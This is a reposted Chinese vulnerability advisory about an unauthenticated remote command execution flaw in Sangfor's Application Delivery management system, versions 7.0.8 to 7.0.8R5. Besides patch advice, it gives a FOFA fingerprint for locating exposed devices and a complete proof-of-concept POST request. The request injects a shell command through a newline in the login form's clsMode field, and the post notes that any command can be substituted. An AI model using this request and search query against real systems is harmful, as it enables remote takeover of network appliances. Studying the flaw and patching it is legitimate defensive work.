【漏洞情报 | 新】深信服应用交付系统RCE

admin 2023年8月12日01:50:19评论294 views字数 1275阅读4分15秒阅读模式

免责说明

文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

产品简介

深信服应用交付 AD 能够为用户提供包括多数据中心负载均衡、多链路负载均衡、服务器负载均衡的全方位解决方案。不仅实现对各个数据中心、链路以及服务器状态的实时监控,同时根据预设规则,将用户的访问请求分配给相应的数据中心、 链路以及服务器,进而实现数据流的合理分配,使所有的数据中心、链路和服务器都得到充分利用。

漏洞简述

深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以执行任意命令。

影响版本

深信服应用交付管理系统 7.0.8-7.0.8R5

网络测绘

favicon图标特征【漏洞情报 | 新】深信服应用交付系统RCE

FOFA网络测绘搜索

fid="iaytNA57019/kADk8Nev7g=="

漏洞复现

访问登录界面【漏洞情报 | 新】深信服应用交付系统RCEPOC

POST /rep/login HTTP/1.1
Host: 1.1.1.1:85
Cookie: UEDC_LOGIN_POLICY_VALUE=checked
Content-Length: 124
Sec-Ch-Ua: "Not/A)Brand";v="99""Google Chrome";v="115""Chromium";v="115"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://1.1.1.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://1.1.1.1:85/rep/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

clsMode=cls_mode_login%0Awhoami%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

【漏洞情报 | 新】深信服应用交付系统RCE

通过更改%0A中间的参数执行任意命令

修复方案

1、升级到不受影响的高版本。

2、升级SP_AD_JG_01以上的加固补丁包,建议使用巡检工具巡检后升级最新加固包。


原文始发于微信公众号(划水但不摆烂):【漏洞情报 | 新】深信服应用交付系统RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月12日01:50:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞情报 | 新】深信服应用交付系统RCEhttp://cn-sec.com/archives/1951215.html

发表评论

匿名网友 填写信息